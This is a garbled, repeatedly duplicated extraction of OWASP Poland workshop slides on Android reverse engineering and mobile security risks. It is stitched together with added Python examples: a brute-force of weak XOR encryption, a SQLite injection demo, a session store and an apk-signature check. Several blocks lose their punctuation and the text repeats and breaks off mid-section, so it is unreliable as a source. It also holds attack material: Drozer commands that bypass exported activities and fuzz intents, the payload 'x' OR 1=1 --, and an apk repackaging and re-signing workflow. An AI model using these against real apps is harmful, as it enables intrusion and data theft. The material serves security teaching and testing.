id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography – real example
• NQ Vault (see the "Cracking NQ Vault step by step" reference)
Broken Cryptography - mitigations
• Use known, strong cryptography implementations (platform or well-reviewed library code, never a custom cipher)
• Do not hardcode keys, credentials or OAuth tokens
• Do not store keys on the device. Use password-based encryption instead (derive the key from the user's password at runtime with a salted, iterated KDF, so only the salt is stored)
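The two sides of this section, breaking a home-made scheme found during the "how to find" step and the password-based derivation the mitigations call for, as a worked example added here. It is not code from the workshop, from NQ Vault or from any other product: the XOR-over-the-header scheme, the PIN-to-byte derivation, the PBKDF2 parameters and the sample file contents are all constructed for illustration.

```python
import hashlib
import hmac
import os

# A toy "custom encryption" of the kind found in decompiled apps. Constructed
# for this example (it is not any particular product's scheme): only the first
# HEADER_LEN bytes are XORed with a single byte derived from the user's PIN,
# the remainder of the file is stored in the clear.
HEADER_LEN = 128


def pin_to_key_byte(pin: str) -> int:
    # Weak derivation: the digit sum modulo 256, so at most 256 distinct keys.
    return sum(int(c) for c in pin) % 256


def weak_encrypt(plaintext: bytes, pin: str) -> bytes:
    k = pin_to_key_byte(pin)
    head = bytes(b ^ k for b in plaintext[:HEADER_LEN])
    return head + plaintext[HEADER_LEN:]


def weak_decrypt(blob: bytes, pin: str) -> bytes:
    return weak_encrypt(blob, pin)  # XOR with the same byte is its own inverse


def crack_weak(blob: bytes, known_magic: bytes) -> int:
    """Recover the key byte with no PIN at all: try all 256 values and keep the
    one that turns the header back into the expected file magic. Returns -1 if
    no candidate matches (the blob was not produced by this scheme)."""
    for k in range(256):
        if bytes(b ^ k for b in blob[:len(known_magic)]) == known_magic:
            return k
    return -1


# What the mitigations ask for instead: a password-based key derivation. The
# device stores only a random salt (and the iteration count); the key exists
# in memory only while the user has supplied the password.
PBKDF2_ITERATIONS = 200_000   # illustrative; tune to the device's CPU budget
SALT_LEN = 16
KEY_LEN = 32


def new_salt() -> bytes:
    return os.urandom(SALT_LEN)


def derive_key(password: str, salt: bytes, iterations: int = PBKDF2_ITERATIONS) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt,
                               iterations, dklen=KEY_LEN)


def key_check_value(key: bytes) -> bytes:
    """A stored verifier that lets the app tell a wrong password from a corrupt
    file without storing the key: an HMAC of a fixed label under the key."""
    return hmac.new(key, b"key-check", "sha256").digest()


def password_matches(password: str, salt: bytes, stored_kcv: bytes) -> bool:
    key = derive_key(password, salt)
    return hmac.compare_digest(key_check_value(key), stored_kcv)


SQLITE_MAGIC = b"SQLite format 3\x00"   # first 16 bytes of every SQLite file


def demo() -> dict:
    """Walk through both sides on a constructed stand-in for a database file."""
    db = SQLITE_MAGIC + bytes(range(256))
    blob = weak_encrypt(db, "4711")
    k = crack_weak(blob, SQLITE_MAGIC)          # no PIN needed, 256 tries max
    recovered = bytes(b ^ k for b in blob[:HEADER_LEN]) + blob[HEADER_LEN:]

    salt = new_salt()
    kcv = key_check_value(derive_key("correct horse", salt))
    return {
        "cracked_key_byte": k,
        "recovered_ok": recovered == db,
        "right_password": password_matches("correct horse", salt, kcv),
        "wrong_password": password_matches("correct h0rse", salt, kcv),
    }


if __name__ == "__main__":
    print(demo())
```

The point of the first half is that a reviewer does not need to understand the PIN derivation at all: a known plaintext (here the SQLite header) plus a tiny key space is enough. The second half stores nothing an attacker can use directly; guessing now costs one full PBKDF2 run per candidate password, and the check value is compared in constant time.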
M7 - Client side injection
Client side injection – what it is
• Simple words definition: malicious input can be provided to the application and executed by it (on the client side)
• The malicious input can come from:
- another application, via an Intent or a content provider
- a shared file
- a server response
- a third-party website
Client side injection – what to inject
• SQL injection into the local db
• XSS / WebView injection
• Directory traversal
• Intent injection
A new Android toy – the Intents
• An Android application can talk (Inter-Process Communication) to any other component (e.g. another application, a system service, a new activity, etc.) via special objects called Intents:
Intent i = new Intent(Intent.ACTION_VIEW, Uri.parse("https://owasp.org"));            // implicit: whoever handles VIEW for this URL
Intent j = new Intent(android.provider.MediaStore.ACTION_IMAGE_CAPTURE);              // implicit: ask a camera app for a picture
Client side injection – how to find
• SQL injections:
dz> run scanner.provider.injection -a <package_name>
• Data path traversal:
dz> run scanner.provider.traversal -a <package_name>
• Intent injections (enumerate what is exported, then fuzz it):
dz> run app.package.manifest <package_name>
dz> run app.activity.info -a <package_name>
dz> run app.service.info --permission null -a <package_name>
dz> run intents.fuzzinozer --package_name <package_name> --fuzzing_intent
Client side injection – real example
• The UniversalMDMClient (a built-in application of Samsung KNOX, a security feature that separates personal and professional activities)
• A crafted "smdm://" URI allows remote installation of ANY application while the user thinks he is installing an update for UniversalMDMClient
• How it works in practice: https://www.youtube.com/watch?time_continue=56&v=6O9OBmsv-CM
Client side injection - mitigations
• Always validate any user input on the server side (and treat data arriving from other apps, shared files and WebViews as untrusted input too)
• For internal communication use only explicit Intents (target the component by class name)
• Avoid intent-filters on internal components. An implicit Intent your app sends to itself can be caught by any other application that declares a matching filter; the system then displays a chooser dialog so the user can pick which app handles it, and the user may pick the wrong one. Setting exported="false" on your own Activity does not prevent this, because it is the sender's implicit Intent that gets hijacked, not your component that gets invoked
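The "SQL injection into the local db" case, as an example added here rather than code from the workshop. It uses Python's sqlite3 module as a stand-in for the SQLite database behind an Android content provider: the table, rows and the vulnerable `query_vulnerable` function are constructed for illustration, and the payload is the classic tautology that `scanner.provider.injection` also tries against a provider's `selection` argument.

```python
import sqlite3
from typing import List, Tuple

# Constructed sample data standing in for an app-local SQLite table that a
# content provider exposes; names and secrets are made up for this example.
ROWS = [
    ("mail", "alice", "s3cr3t"),
    ("bank", "alice", "hunter2"),
    ("mail", "bob", "letmein"),
]


def make_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE passwords (id INTEGER PRIMARY KEY, "
                "service TEXT, owner TEXT, secret TEXT)")
    con.executemany("INSERT INTO passwords (service, owner, secret) VALUES (?, ?, ?)", ROWS)
    return con


def query_vulnerable(con: sqlite3.Connection, owner: str, service: str) -> List[Tuple[str, str, str]]:
    """Mirrors a provider query() that pastes caller-controlled selection text
    straight into the SQL string: this is what scanner.provider.injection finds."""
    sql = ("SELECT service, owner, secret FROM passwords "
           "WHERE owner = '%s' AND service = '%s'" % (owner, service))
    return con.execute(sql).fetchall()


def query_safe(con: sqlite3.Connection, owner: str, service: str) -> List[Tuple[str, str, str]]:
    """Parameterised form: the values travel as bound arguments, never as SQL.
    On Android this is a selection with '?' placeholders plus selectionArgs."""
    sql = ("SELECT service, owner, secret FROM passwords "
           "WHERE owner = ? AND service = ?")
    return con.execute(sql, (owner, service)).fetchall()


# Closes the quoted string, ORs in a tautology, comments out the rest of the WHERE.
INJECTION = "x' OR 1=1 --"


def run_comparison(owner: str, service: str = "mail") -> dict:
    """Run the same (owner, service) pair through both query styles."""
    con = make_db()
    try:
        return {
            "vulnerable_rows": len(query_vulnerable(con, owner, service)),
            "safe_rows": len(query_safe(con, owner, service)),
        }
    finally:
        con.close()


if __name__ == "__main__":
    print("legit  :", run_comparison("alice"))     # {'vulnerable_rows': 1, 'safe_rows': 1}
    print("inject :", run_comparison(INJECTION))   # {'vulnerable_rows': 3, 'safe_rows': 0}
```

With the payload the vulnerable query returns every row in the table, including other users' secrets, while the parameterised query looks for a user literally named `x' OR 1=1 --` and finds nothing. The same split applies to the `projection` and `sortOrder` arguments of a provider: anything a caller supplies must be bound or validated against an allow-list, never concatenated.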
M9 - Improper session handling
Improper session handling – what it is
• Simple words definition: if your session token can be guessed, retrieved by a third party, or never expires, then you have a problem
Improper session handling – how to find
• Intercept requests with a proxy (e.g. Burp) and verify:
- whether a session expires (copy a cookie and try to use it after 30 minutes)
- whether a session is destroyed after the authentication state changes (e.g. switching from one logged-in user to another logged-in user)
- whether you are able to guess any other session (e.g. it's easy to impersonate another user when the application uses the device ID as a session token)
Improper session handling – a few facts from reality
• What we know is that "sessions have to expire"…
• …but how long should they REALLY last?
• According to the experiment, the average application session (counted from opening an app to closing it) lasts… 71.56 seconds
- http://www.mendeley.com/research/falling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
• Invalidate sessions on the server side
• Set a session expiration time adjusted to your application
• Destroy all unused session tokens
• Use only high-entropy, tested token generation sources (the platform's cryptographically secure random generator, never the device ID, timestamps or sequential IDs)
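A server-side session store that implements the four mitigations above, added here as an example (it is not code from the workshop). The class, its default timeouts and the `simulate` walkthrough with a fake clock are all constructed for illustration; the timeouts are placeholders to be tuned per application.

```python
import secrets
import time
from dataclasses import dataclass
from typing import Callable, Dict, Optional


@dataclass
class Session:
    user: str
    issued_at: float
    last_seen: float


class SessionStore:
    """Server-side session table (constructed for this example). The two
    timeouts are illustrative defaults; tune them to the application."""

    def __init__(self, idle_timeout: float = 30 * 60,
                 absolute_timeout: float = 12 * 3600,
                 clock: Callable[[], float] = time.time) -> None:
        self.idle_timeout = idle_timeout
        self.absolute_timeout = absolute_timeout
        self.clock = clock
        self._sessions: Dict[str, Session] = {}

    def create(self, user: str) -> str:
        # 32 bytes from the OS CSPRNG (256 bits), URL-safe encoded. Never derive
        # a token from the device ID, user ID or a timestamp: those are guessable.
        token = secrets.token_urlsafe(32)
        now = self.clock()
        self._sessions[token] = Session(user, now, now)
        return token

    def validate(self, token: str) -> Optional[str]:
        """Return the user bound to a live token, or None. A token past its idle
        or absolute limit is destroyed on the spot, not left lying around."""
        s = self._sessions.get(token)
        if s is None:
            return None
        now = self.clock()
        if (now - s.last_seen > self.idle_timeout
                or now - s.issued_at > self.absolute_timeout):
            del self._sessions[token]
            return None
        s.last_seen = now
        return s.user

    def invalidate(self, token: str) -> None:
        """Explicit logout: the server forgets the token, so a copy an attacker
        captured earlier stops working as well."""
        self._sessions.pop(token, None)

    def on_auth_change(self, user: str) -> str:
        """Login, password change or privilege change: drop every token the user
        holds and issue a fresh one. Covers the 'old token still valid after the
        authentication state changed' finding and session fixation."""
        for tok in [t for t, s in self._sessions.items() if s.user == user]:
            del self._sessions[tok]
        return self.create(user)

    def purge_expired(self) -> int:
        """Housekeeping for tokens nobody presented again; returns how many died."""
        now = self.clock()
        dead = [t for t, s in self._sessions.items()
                if now - s.last_seen > self.idle_timeout
                or now - s.issued_at > self.absolute_timeout]
        for t in dead:
            del self._sessions[t]
        return len(dead)

    def live_count(self) -> int:
        return len(self._sessions)


def simulate() -> dict:
    """Drive the store with a fake clock so the behaviour is reproducible."""
    now = [1_000_000.0]
    store = SessionStore(clock=lambda: now[0])
    out = {}
    tok = store.create("alice")
    out["token_len_ok"] = len(tok) >= 43                      # 256 bits of entropy
    out["fresh_valid"] = store.validate(tok) == "alice"
    now[0] += 29 * 60
    out["valid_before_idle"] = store.validate(tok) == "alice"  # use resets the idle timer
    now[0] += 31 * 60
    out["expired_after_idle"] = store.validate(tok) is None
    tok2 = store.create("alice")
    tok3 = store.on_auth_change("alice")                       # e.g. the user changed password
    out["old_token_dead"] = store.validate(tok2) is None
    out["new_token_live"] = store.validate(tok3) == "alice"
    now[0] += 13 * 3600
    out["purged"] = store.purge_expired()                      # tok3 is past the absolute limit
    out["live_after"] = store.live_count()
    return out


if __name__ == "__main__":
    print(simulate())
```

The idle timeout is what the "copy a cookie and try it after 30 minutes" check exercises; the absolute timeout caps how long a stolen token is useful even for an active attacker; `on_auth_change` is what makes the "switch user, old token still works" test fail as it should. The client keeps nothing but the opaque token, so there is no client-side expiry logic to bypass.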
Thank you
pawel.rzepa@outlook.com
References
• https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risks
• https://github.com/ikust/hello-pinnedcerts
• http://www.exploresecurity.com/testing-for-cipher-suite-preference/
• http://resources.infosecinstitute.com/android-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakage/
• http://www.slideshare.net/JackMannino/owasp-top-10-mobile-risks
• https://manifestsecurity.com/android-application-security/
• https://mobilesecuritywiki.com/
• http://androidcracking.blogspot.de/2014/02/zerdeis-luyten-worthwhile-jd-gui.html
• https://www.acsac.org/2011/openconf/modules/request.php?module=oc_program&action=view.php&a=&id=111&type=3&OPENCONF=54jm3hh7laelc19qq6ernql5m2
• https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Mobile_Threat_Model
• https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Security_Testing
• https://www.owasp.org/images/7/77/Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl%2BMarian_Harbach%2BMathew_Smith.pdf
• https://www.ssllabs.com/ssltest/
• http://www.slideshare.net/ibmsecurity/overtaking-firefox-profiles-vulnerabilities-in-firefox-for-android
• http://resources.infosecinstitute.com/cracking-nq-vault-step-by-step/
• http://www.slideshare.net/ibmsecurity/pinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystack
• https://github.com/linkedin/qark
• https://www.mendeley.com/catalog/falling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage/
• http://blog.quarkslab.com/abusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerability.html
• http://www.bkav.com/top-news/-/view_content/content/46264/critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screen
• http://thehackernews.com/2014/05/microsoft-outlook-app-for-android.html
• https://drive.google.com/file/d/0BxOPagp1jPHWVnlzWGNVbFBMTW8/view?pref=2&pli=1
Reverse Engineering & Malware Analysis
Daniel Ramirez, OWASP Poland, 24.02.2016
Anatomy of an apk
Getting our apk file
• From the phone:
- APKOptic
- Astro File Manager
• Using ADB
• Using APKpure
Decompiling || Disassembling
• Decompiling – high level: Java code
• Disassembling – low level: assembly-like code (Smali)
• Why disassemble and not decompile? Decompiler output is a best-effort reconstruction that breaks on obfuscated or unusual bytecode, while Smali is a faithful listing that can be edited, reassembled and repackaged
Decompiling
DEX → JAR → JAVA
Decompiling - dex2jar
• dex2jar:
- Converts Dalvik bytecode (DEX) to Java bytecode (JAR)
- Allows the use of any existing Java decompiler on the resulting JAR file
Decompiling – Java Decompilers
• JD-GUI || Luyten:
- JD-GUI is a (historically closed-source) Java decompiler; Luyten is an open-source GUI for the Procyon decompiler
- Combined with dex2jar, you can use JD-GUI or Luyten to decompile Android applications
• Both are Java decompilers, but they produce different OUTPUT
JD-GUI (screenshot)
Luyten (screenshot)
Disassembling
DEX → SMALI
• Apktool:
- Open-source Java tool for reverse engineering Android apps
- Transforms binary Dalvik bytecode (dex) into Smali source, and rebuilds edited Smali back into an apk
Signing apk
• Using signapk.jar:
java -jar signapk.jar certificate.pem key.pk8 your-app.apk your-app-signed.apk
• Using AppUse
• A rebuilt apk must be re-signed before it will install; because the key differs from the developer's, the original app has to be uninstalled first (the update would fail the signature check)
Demo Time
Demo: Decompiling with Luyten
Demo: Modifying Smali files
Demo
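Why the "modify Smali, rebuild, sign" sequence ends with signing, shown on the apk's own anatomy. This example is added here and is not the workshop's code: it builds a tiny in-memory apk (a zip whose `AndroidManifest.xml`, `classes.dex` and `resources.arsc` contents are placeholders) with the `META-INF/MANIFEST.MF` that the JAR/v1 signing scheme uses, patches `classes.dex` the way an apktool rebuild does, and shows the per-entry digest check failing until the archive is re-signed. A real signature adds `CERT.SF` and `CERT.RSA` (and modern apks carry v2/v3 signing blocks as well); the manifest parser here is simplified and does not handle the 72-byte line continuation of long entry names.

```python
import base64
import hashlib
import io
import zipfile
from typing import Dict


def build_manifest(entries: Dict[str, bytes]) -> bytes:
    """Build META-INF/MANIFEST.MF as the JAR (apk v1) scheme does: one
    SHA1-Digest line per archived file (newer tools emit SHA-256-Digest)."""
    lines = ["Manifest-Version: 1.0", "Created-By: example", ""]
    for name, data in entries.items():
        digest = base64.b64encode(hashlib.sha1(data).digest()).decode()
        lines += [f"Name: {name}", f"SHA1-Digest: {digest}", ""]
    return ("\r\n".join(lines) + "\r\n").encode()


def build_apk(entries: Dict[str, bytes]) -> bytes:
    """Zip the entries plus their manifest into an in-memory 'apk'. Constructed
    sample: no CERT.SF / CERT.RSA is produced because there is no key here."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        for name, data in entries.items():
            z.writestr(name, data)
        z.writestr("META-INF/MANIFEST.MF", build_manifest(entries))
    return buf.getvalue()


def parse_manifest(text: str) -> Dict[str, str]:
    """Map entry name -> base64 SHA-1 from a manifest (short names only)."""
    digests, name = {}, None
    for line in text.splitlines():
        if line.startswith("Name: "):
            name = line[len("Name: "):]
        elif line.startswith("SHA1-Digest: ") and name:
            digests[name] = line[len("SHA1-Digest: "):]
    return digests


def check_digests(apk: bytes) -> Dict[str, bool]:
    """Recompute each entry's SHA-1 and compare with MANIFEST.MF, the first
    thing a v1 verifier does; a patched classes.dex shows up as a mismatch."""
    result = {}
    with zipfile.ZipFile(io.BytesIO(apk)) as z:
        expected = parse_manifest(z.read("META-INF/MANIFEST.MF").decode())
        for name, want in expected.items():
            got = base64.b64encode(hashlib.sha1(z.read(name)).digest()).decode()
            result[name] = (got == want)
    return result


def patch_entry(apk: bytes, name: str, new_data: bytes) -> bytes:
    """Replace one file without touching META-INF: what editing Smali and
    rebuilding does before the apk is signed again."""
    buf = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(apk)) as src, \
            zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as dst:
        for item in src.infolist():
            data = new_data if item.filename == name else src.read(item.filename)
            dst.writestr(item.filename, data)
    return buf.getvalue()


# Constructed placeholder contents; only the dex magic is realistic.
SAMPLE_ENTRIES = {
    "AndroidManifest.xml": b"<placeholder binary xml>",
    "classes.dex": b"dex\n035\x00" + b"\x00" * 32,
    "resources.arsc": b"\x02\x00\x0c\x00",
}


if __name__ == "__main__":
    original = build_apk(SAMPLE_ENTRIES)
    print("original :", check_digests(original))
    patched = patch_entry(original, "classes.dex", b"dex\n035\x00patched")
    print("patched  :", check_digests(patched))   # classes.dex -> False
```

Re-signing with signapk.jar regenerates the manifest digests, `CERT.SF` and the `CERT.RSA` signature over them, which is why the installer accepts the rebuilt apk afterwards, and why it is then bound to the analyst's key rather than the developer's.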
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
